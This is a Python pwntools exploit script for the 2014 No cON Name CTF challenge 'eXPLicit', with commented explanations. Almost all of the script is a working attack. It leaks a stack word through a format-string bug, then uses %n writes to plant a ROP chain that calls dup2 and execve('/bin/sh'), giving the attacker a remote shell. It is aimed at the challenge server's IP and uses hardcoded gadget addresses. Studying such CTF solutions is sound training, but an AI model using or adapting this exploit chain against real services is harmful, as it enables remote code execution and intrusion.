No cON Name CTF Quals 2014 - eXPLicit
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import time | |
import re | |
from pwn import * | |
from libformatstr import * | |
REMOTE = 0  # non-zero -> the CTF server, zero -> a local copy of the service
# Target endpoint; both profiles listen on the same port.
if REMOTE:
    host, port = '88.87.208.163', 7070
else:
    host, port = '127.0.0.1', 7070
def connect():
    """Open a pwntools socket to the host/port selected by REMOTE."""
    conn = remote(host, port)
    return conn
def retrieve_val(res):
    """Pull the echoed value out of the service's "too low" reply.

    The service reflects whatever it printed for our input between
    'Your number is ' and ' which is too low.'; that substring is returned
    as a string, or None when `res` does not contain such a reply.

    NOTE(review): the pattern is a str; under Python 3 pwntools `recv*`
    returns bytes, which would make re.search raise TypeError here.
    """
    matched = re.search('Your number is (.+) which is too low.', res)
    return matched.group(1) if matched else None
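def dump_stack():
    """Print successive stack words leaked through positional '%N$x' probes.

    One probe is sent per index in 1..99 on the module-level connection ``s``
    and the word the service echoes back is printed next to its index, so the
    slot of interest (the one used for the '%69$x' leak below) can be located.
    If a probe yields no parsable leak the raw reply is printed and the session
    is handed over interactively for manual inspection.

    Debugging aid only; the module-level call is commented out.
    """
    for i in range(1, 100):
        payload = "%%%d$x\n" % i
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            # Bug fix: the original printed the module-level ``buf``, which is
            # only assigned after the (commented-out) call site, so reaching
            # this branch raised NameError. Show this probe's reply instead.
            # (The original's indentation was lost; s.interactive() is kept on
            # the failure path, which is where a debugging helper needs it.)
            print res
            s.interactive()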
def send_fmt(payload):
    """Answer the number prompt with `payload` plus a newline.

    Uses the module-level connection ``s``; the trailing newline makes the
    service consume the whole payload as a single answer.
    """
    prompt = 'Pick a number between 0 and 20: '
    line = payload + '\n'
    s.sendafter(prompt, line)
# Exploit body. The service's format-string bug is used in two ways: first as a
# read ('%69$x') to leak a stack word, then through libformatstr's %n-style
# writes to plant a ROP chain over the saved return address and to stage the
# argv array for execve. Every address below is fixed for the challenge binary
# as shipped (no PIE/ASLR relocation is computed); only retaddr comes from the
# leak. This is precisely the class of bug that -Wformat-security,
# FORTIFY_SOURCE and stack protection are meant to flag or blunt.
bss = 0x80d6080 + 0x100  # writable scratch area (presumably in .bss) for the argv array and "/bin/sh"
int80 = 0x8082715 # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret
s = connect()
#dump_stack()
# Leak format argument 69 and treat (leaked word - 76) as the address of the
# saved return-address slot. Both numbers are binary-specific; the index was
# presumably located with dump_stack().
send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # binary-specific offset from the leaked word to the return slot
log.info('retaddr = %x' % retaddr)
# dup2(4, 0): eax=0x3f (i386 dup2), ecx=0 (newfd), ebx=4 (oldfd, presumably the client socket)
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 0, 0x4, int80]
# payload(6): 6 is the format-argument index at which the sent buffer itself
# sits on the stack, which libformatstr needs to aim its %n writes.
send_fmt(p.payload(6))
retaddr += 4*6  # advance past the six dwords just written
# dup2(4, 1): same chain shape, newfd=1
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 1, 0x4, int80]
send_fmt(p.payload(6))
retaddr += 4*6  # advance past the six dwords just written
# execve("/bin/sh", ["/bin/sh", NULL], NULL):
# eax=0x0b (i386 execve), edx=0 (envp), ecx=bss (argv), ebx=bss+8 (path string)
p = FormatStr()
p[retaddr] = [popeax, 0x0b, popedx_ecx_ebx, 0, bss, bss+4*2, int80]
send_fmt(p.payload(6))
# ["/bin/sh", NULL]: argv[0] -> bss+8, argv[1] = NULL, then the string itself at bss+8
p = FormatStr()
p[bss] = [bss+4*2, 0, '/bin/sh']
send_fmt(p.payload(6))
s.interactive()